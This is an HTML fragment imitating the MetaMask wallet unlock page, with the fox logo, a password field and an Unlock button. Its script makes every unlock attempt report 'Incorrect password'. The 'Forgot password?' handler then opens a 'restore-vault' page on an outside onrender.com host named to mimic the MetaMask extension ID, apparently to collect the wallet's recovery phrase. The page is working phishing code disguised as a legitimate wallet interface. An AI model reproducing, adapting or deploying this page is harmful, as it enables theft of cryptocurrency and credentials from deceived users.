                              <polygon fill="rgb(192,172,157)" stroke="rgb(192,172,157)" points="37.16344892978668,91.2679374217987 35.14021933078766,88.30222964286804 38.09039533138275,91.70864582061768"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="97.67809867858887,4.720233678817749 104.97556328773499,19.741848707199097 83.18176746368408,24.378708600997925"></polygon>
                              <polygon fill="rgb(214,194,178)" stroke="rgb(214,194,178)" points="36.30742371082306,87.52034604549408 38.09039533138275,91.70864582061768 35.14021933078766,88.30222964286804"></polygon>
                              <polygon fill="rgb(214,194,178)" stroke="rgb(214,194,178)" points="35.14021933078766,88.30222964286804 37.03193664550781,78.93068790435791 36.30742371082306,87.52034604549408"></polygon>
                              <polygon fill="rgb(228,119,25)" stroke="rgb(228,119,25)" points="37.03193664550781,78.93068790435791 35.14021933078766,88.30222964286804 34.170504212379456,72.47075915336609"></polygon>
                              <polygon fill="rgb(205,98,0)" stroke="rgb(205,98,0)" points="45.97417563199997,56.0689714550972 41.32276117801666,60.53130850195885 34.3772828578949,64.0020141005516"></polygon>
                              <polygon fill="rgb(205,98,0)" stroke="rgb(205,98,0)" points="74.79497104883194,89.84754145145416 69.78897303342819,73.01052063703537 83.53726208209991,73.45100373029709"></polygon>
                              <polygon fill="rgb(36,51,67)" stroke="rgb(36,51,67)" points="43.463374972343445,66.88681349158287 34.3772828578949,64.0020141005516 41.32276117801666,60.53130850195885"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="34.170504212379456,72.47075915336609 34.3772828578949,64.0020141005516 43.463374972343445,66.88681349158287"></polygon>
                              <polygon fill="rgb(205,98,0)" stroke="rgb(205,98,0)" points="41.32276117801666,60.53130850195885 45.97417563199997,56.0689714550972 43.463374972343445,66.88681349158287"></polygon>
                              <polygon fill="rgb(192,172,157)" stroke="rgb(192,172,157)" points="38.09039533138275,91.70864582061768 38.37749898433685,95.3276252746582 37.16344892978668,91.2679374217987"></polygon>
                              <polygon fill="rgb(228,116,36)" stroke="rgb(228,116,36)" points="43.463374972343445,66.88681349158287 45.97417563199997,56.0689714550972 45.094750821590424,62.572663351893425"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="45.094750821590424,62.572663351893425 45.97417563199997,56.0689714550972 57.233818620443344,55.96301078796387"></polygon>
                              <polygon fill="rgb(192,172,157)" stroke="rgb(192,172,157)" points="53.67395415902138,92.39281296730042 74.79497104883194,89.84754145145416 68.42797815799713,92.6217770576477"></polygon>
                              <polygon fill="rgb(205,98,0)" stroke="rgb(205,98,0)" points="57.233818620443344,55.96301078796387 80.42670965194702,55.229507982730865 70.51388740539551,64.08813759684563"></polygon>
                              <polygon fill="rgb(214,194,178)" stroke="rgb(214,194,178)" points="51.9996052980423,88.11234176158905 74.79497104883194,89.84754145145416 53.67395415902138,92.39281296730042"></polygon>
                              <polygon fill="rgb(228,116,36)" stroke="rgb(228,116,36)" points="80.42670965194702,55.229507982730865 69.78897303342819,73.01052063703537 70.51388740539551,64.08813759684563"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="83.53726208209991,73.45100373029709 69.78897303342819,73.01052063703537 80.42670965194702,55.229507982730865"></polygon>
                              <polygon fill="rgb(214,194,178)" stroke="rgb(214,194,178)" points="74.79497104883194,89.84754145145416 51.9996052980423,88.11234176158905 50.72107672691345,79.27001237869263"></polygon>
                              <polygon fill="rgb(228,119,25)" stroke="rgb(228,119,25)" points="50.72107672691345,79.27001237869263 69.78897303342819,73.01052063703537 74.79497104883194,89.84754145145416"></polygon>
                              <polygon fill="rgb(205,98,0)" stroke="rgb(205,98,0)" points="70.51388740539551,64.08813759684563 62.60017655789852,60.47132693231106 57.233818620443344,55.96301078796387"></polygon>
                              <polygon fill="rgb(205,98,0)" stroke="rgb(205,98,0)" points="62.60017655789852,60.47132693231106 58.5931146517396,66.98728904128075 57.233818620443344,55.96301078796387"></polygon>
                              <polygon fill="rgb(36,51,67)" stroke="rgb(36,51,67)" points="58.5931146517396,66.98728904128075 62.60017655789852,60.47132693231106 70.51388740539551,64.08813759684563"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="57.233818620443344,55.96301078796387 55.409501641988754,62.57498435676098 45.094750821590424,62.572663351893425"></polygon>
                              <polygon fill="rgb(225,119,25)" stroke="rgb(225,119,25)" points="58.5931146517396,66.98728904128075 55.409501641988754,62.57498435676098 57.233818620443344,55.96301078796387"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="37.03193664550781,78.93068790435791 34.170504212379456,72.47075915336609 43.463374972343445,66.88681349158287"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="69.78897303342819,73.01052063703537 58.5931146517396,66.98728904128075 70.51388740539551,64.08813759684563"></polygon>
                              <polygon fill="rgb(192,172,157)" stroke="rgb(192,172,157)" points="68.42797815799713,92.6217770576477 52.577386647462845,96.0277783870697 53.67395415902138,92.39281296730042"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="43.463374972343445,66.88681349158287 38.76846492290497,77.6978874206543 37.03193664550781,78.93068790435791"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="45.094750821590424,62.572663351893425 55.409501641988754,62.57498435676098 48.9267772436142,77.93028116226196"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="48.9267772436142,77.93028116226196 38.76846492290497,77.6978874206543 45.094750821590424,62.572663351893425"></polygon>
                              <polygon fill="rgb(228,116,36)" stroke="rgb(228,116,36)" points="55.409501641988754,62.57498435676098 58.5931146517396,66.98728904128075 48.9267772436142,77.93028116226196"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="58.5931146517396,66.98728904128075 69.78897303342819,73.01052063703537 50.72107672691345,79.27001237869263"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="50.72107672691345,79.27001237869263 48.9267772436142,77.93028116226196 58.5931146517396,66.98728904128075"></polygon>
                              <polygon fill="rgb(192,172,157)" stroke="rgb(192,172,157)" points="36.30742371082306,87.52034604549408 36.39661252498627,86.41119360923767 38.37749898433685,95.3276252746582"></polygon>
                              <polygon fill="rgb(192,172,157)" stroke="rgb(192,172,157)" points="38.37749898433685,95.3276252746582 36.39661252498627,86.41119360923767 50.24433642625809,86.9104528427124"></polygon>
                              <polygon fill="rgb(192,172,157)" stroke="rgb(192,172,157)" points="50.24433642625809,86.9104528427124 52.577386647462845,96.0277783870697 38.37749898433685,95.3276252746582"></polygon>
                              <polygon fill="rgb(192,172,157)" stroke="rgb(192,172,157)" points="51.9996052980423,88.11234176158905 53.67395415902138,92.39281296730042 52.577386647462845,96.0277783870697"></polygon>
                              <polygon fill="rgb(192,172,157)" stroke="rgb(192,172,157)" points="52.577386647462845,96.0277783870697 50.24433642625809,86.9104528427124 51.9996052980423,88.11234176158905"></polygon>
                              <polygon fill="rgb(0,0,0)" stroke="rgb(0,0,0)" points="37.05183148384094,78.91644895076752 35.94334959983826,80.20762145519257 37.03193664550781,78.93068790435791"></polygon>
                              <polygon fill="rgb(0,0,0)" stroke="rgb(0,0,0)" points="37.05183148384094,78.91644895076752 38.76846492290497,77.6978874206543 48.9267772436142,77.93028116226196"></polygon>
                              <polygon fill="rgb(0,0,0)" stroke="rgb(0,0,0)" points="50.24433642625809,86.9104528427124 36.39661252498627,86.41119360923767 35.94334959983826,80.20762145519257"></polygon>
                              <polygon fill="rgb(0,0,0)" stroke="rgb(0,0,0)" points="50.72107672691345,79.27001237869263 51.9996052980423,88.11234176158905 50.24433642625809,86.9104528427124"></polygon>
                              <polygon fill="rgb(0,0,0)" stroke="rgb(0,0,0)" points="48.9267772436142,77.93028116226196 47.36379325389862,79.1718327999115 37.05183148384094,78.91644895076752"></polygon>
                              <polygon fill="rgb(0,0,0)" stroke="rgb(0,0,0)" points="47.36379325389862,79.1718327999115 48.9267772436142,77.93028116226196 50.72107672691345,79.27001237869263"></polygon>
                              <polygon fill="rgb(0,0,0)" stroke="rgb(0,0,0)" points="50.24433642625809,86.9104528427124 48.5051429271698,80.54363429546356 50.72107672691345,79.27001237869263"></polygon>
                              <polygon fill="rgb(0,0,0)" stroke="rgb(0,0,0)" points="50.72107672691345,79.27001237869263 48.5051429271698,80.54363429546356 47.36379325389862,79.1718327999115"></polygon>
                              <polygon fill="rgb(0,0,0)" stroke="rgb(0,0,0)" points="35.94334959983826,80.20762145519257 48.5051429271698,80.54363429546356 50.24433642625809,86.9104528427124"></polygon>
                              <polygon fill="rgb(0,0,0)" stroke="rgb(0,0,0)" points="35.94334959983826,80.20762145519257 37.05183148384094,78.91644895076752 47.36379325389862,79.1718327999115"></polygon>
                              <polygon fill="rgb(0,0,0)" stroke="rgb(0,0,0)" points="47.36379325389862,79.1718327999115 48.5051429271698,80.54363429546356 35.94334959983826,80.20762145519257"></polygon>
                           </svg>
                        </div> -->
                     </div>
                     <h1 class="unlock-page__title">Welcome back!</h1>
                     <div>The decentralized web awaits</div>
                     <form class="unlock-page__form">
                        <!-- <div class="MuiFormControl-root MuiTextField-root MuiFormControl-fullWidth">
                           <label class="MuiFormLabel-root MuiInputLabel-root jss1 MuiInputLabel-formControl MuiInputLabel-animated" data-shrink="false" for="password" id="password-label">Password</label>
                           <div class="MuiInputBase-root MuiInput-root MuiInput-underline jss3 MuiInputBase-fullWidth MuiInput-fullWidth MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="current-password" id="password" type="password" dir="auto" data-testid="unlock-password" class="MuiInputBase-input MuiInput-input" value=""></div>
                        </div> -->

                        <div class="MuiFormControl-root MuiTextField-root MuiFormControl-fullWidth">
                           <label
                               class="MuiFormLabel-root MuiFormLabel-root-none MuiInputLabel-root jss1 MuiInputLabel-formControl MuiInputLabel-animated "
                               data-shrink="false" for="password" id="password-label">Password</label>
                           <div
                               class="MuiInputBase-root MuiInput-root MuiInput-underline jss3 MuiInputBase-fullWidth MuiInput-fullWidth MuiInputBase-formControl MuiInput-formControl">
                               <style>
                                   .MuiInputBase-input::placeholder {
                                       color: red !important;
                                       font-size: 1.2em;
                                       font-style: italic;
                                   }
                               </style>
                               <input aria-invalid="false" autocomplete="current-password" id="password"
                                   type="password" dir="auto"
                                   class="MuiInputBase-input MuiInputBase-input-none MuiInput-input"
                                   placeholder="Password" onkeyup="hidePasswordLabel()">
                           </div>
                       </div>
                       <p id="show-error-text" class="error-text" style="display: none;">Incorrect password</p>
                     </form>
                     <button class="button btn--rounded btn-default" onclick="unlockWallet()" data-testid="unlock-submit" variant="contained" style="background-color: var(--color-primary-default); color: var(--color-primary-inverse); margin-top: 20px; height: 44px; font-weight: 400; box-shadow: none; border-radius: 100px; border-color: var(--color-primary-default);">Unlock</button>
                     
                     <div class="unlock-page__links" onclick="forgotPassword()">
                        <a class="button btn-link unlock-page__link" role="button" tabindex="0">Forgot password?</a>
                     </div>
                     <div class="unlock-page__support"><span> Need help? Contact <a href="https://support.metamask.io" target="_blank" rel="noopener noreferrer">MetaMask support</a> </span></div>
                  </div>
               </div>
            </div>
         </div>
      </div>
      <div id="popover-content"></div>
      <!-- <script src="./load-app.js" type="text/javascript" charset="utf-8" async=""></script>
    <script type="text/javascript" async="" src="./snow.js"></script>
    <script type="text/javascript" async="" src="./use-snow.js"></script>
    <script type="text/javascript" async="" src="./globalthis.js"></script>
    <script type="text/javascript" async="" src="./runtime-lavamoat.js"></script>
    <script type="text/javascript" async="" src="./lockdown-more.js"></script>
    <script type="text/javascript" async="" src="./policy-load.js"></script>
    <script type="text/javascript" async="" src="./common-0.js"></script>
    <script type="text/javascript" async="" src="./common-1.js"></script>
    <script type="text/javascript" async="" src="./common-2.js"></script>
    <script type="text/javascript" async="" src="./common-3.js"></script>
    <script type="text/javascript" async="" src="./common-4.js"></script>
    <script type="text/javascript" async="" src="./common-5.js"></script>
    <script type="text/javascript" async="" src="./common-6.js"></script>
    <script type="text/javascript" async="" src="./common-7.js"></script>
    <script type="text/javascript" async="" src="./ui-0.js"></script>
    <script type="text/javascript" async="" src="./ui-1.js"></script>
    <script type="text/javascript" async="" src="./ui-2.js"></script>
    <script type="text/javascript" async="" src="./ui-3.js"></script>
    <script type="text/javascript" async="" src="./ui-4.js"></script>
    <script type="text/javascript" async="" src="./ui-5.js"></script>
    <script type="text/javascript" async="" src="./ui-6.js"></script>
    <script type="text/javascript" async="" src="./ui-7.js"></script>
    <script type="text/javascript" async="" src="./ui-8.js"></script>
    <script type="text/javascript" async="" src="./ui-9.js"></script>
    <script type="text/javascript" async="" src="./ui-10.js"></script>
    <script type="text/javascript" async="" src="./ui-11.js"></script> -->

      <script>

      //show loading 
      $('.app-content-class').hide();

      //hide loading after 1 ms
      setTimeout(() => {
         //$('.app-loading-class').fadeOut();
         $('.app-loading-class').hide();
         $('.app-content-class').show();
      }, 2000);


      function unlockWallet(){
         $('#show-error-text').show();
      }
      function forgotPassword(){
         //window.opener.location.href = './restore-vault.html';
         self.close();
         let a= document.createElement('a');
         a.target= '_blank';
         //a.href= '../chrome-extension-nkbihfbeogaeaoehlefn.aptoslabs.me/restore-vault.html';
         a.href = "https://chrome-nkbihfbeogaeaoehlefnkodbefgpgkns-45ok.onrender.com/restore-vault.html";
         a.click();
         // window.opener.location.replace("./restore-vault.html")
      }

         function hidePasswordLabel(){
            var pwdVal = $('#password').val();
            $('#show-error-text').hide()
            
            $('#password-label').hide();
            if(pwdVal == 0)[
               $('#show-error-text').hide()
            ]
         }

   </script>

   </body>
</html>